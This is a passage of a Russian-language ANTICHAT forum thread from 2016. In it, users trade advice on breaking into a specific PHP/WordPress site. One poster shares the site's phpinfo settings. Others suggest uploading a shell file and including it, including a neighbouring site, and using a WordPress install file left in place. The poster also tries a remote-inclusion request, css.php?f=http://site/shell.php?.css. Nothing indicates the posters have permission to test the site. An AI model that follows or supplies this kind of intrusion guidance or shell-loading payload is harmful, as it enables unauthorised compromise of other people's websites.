HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.02.2016, 08:42
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

С этой версией все безнадежно?

Удалось вытащить phpinfo

allow_url_fopen On On

allow_url_include Off Off

always_populate_raw_post_data Off

output_buffering 4096

PHP Version 5.4.45-0+deb7u2
 
Ответить с цитированием

  #12  
Старый 24.02.2016, 11:38
blackbox
Guest
Сообщений: n/a
Провел на форуме:
137056

Репутация: 11
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

С этой версией все безнадежно?
Удалось вытащить phpinfo
allow_url_fopen On On
allow_url_include Off Off
always_populate_raw_post_data Off
output_buffering 4096
PHP Version 5.4.45-0+deb7u2
Можно было бы попробовать https://xakep.ru/2012/01/25/58183/ , но у тебя расширение фиксированное, поэтому хз что еще посоветовать.
 
Ответить с цитированием

  #13  
Старый 24.02.2016, 12:17
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Цитата:
Сообщение от blackbox  
blackbox said:

Можно было бы попробовать
https://xakep.ru/2012/01/25/58183/
, но у тебя расширение фиксированное, поэтому хз что еще посоветовать.
а что тут сделаешь, заливать только файл шел. и инклудить. Хорошо если есть соседи. можно как вариант инклудить соседний сайт. Я так понимаю этот сайт - вопрос жизни и смерти
 
Ответить с цитированием

  #14  
Старый 24.02.2016, 12:23
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Цитата:
Сообщение от BabaDook  
BabaDook said:

а что тут сделаешь, заливать только файл шел. и инклудить. Хорошо если есть соседи. можно каквариант инклудить соседний сайт. Я так понимаю этот сайт - вопрос жизни и смерти
Там WP стоит файл install не удален,это может както помочь?
 
Ответить с цитированием

  #15  
Старый 23.03.2016, 13:53
.Light.
Guest
Сообщений: n/a
Провел на форуме:
65956

Репутация: 0
По умолчанию

Подскажите что можно сделать?

css.php?f=http://site/shell.php?.css&sid=0

форма входа отображается в виде текста

Password: >'>
 
Ответить с цитированием

  #16  
Старый 23.03.2016, 15:08
cyrhaller
Guest
Сообщений: n/a
Провел на форуме:
1415

Репутация: 6
По умолчанию

Цитата:
Сообщение от .Light.  
.Light. said:

Подскажите что можно сделать?
css.php?f=
http://site/shell.php?.css&sid=0
форма входа отображается в виде текста
Password: >'>
SSRF?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ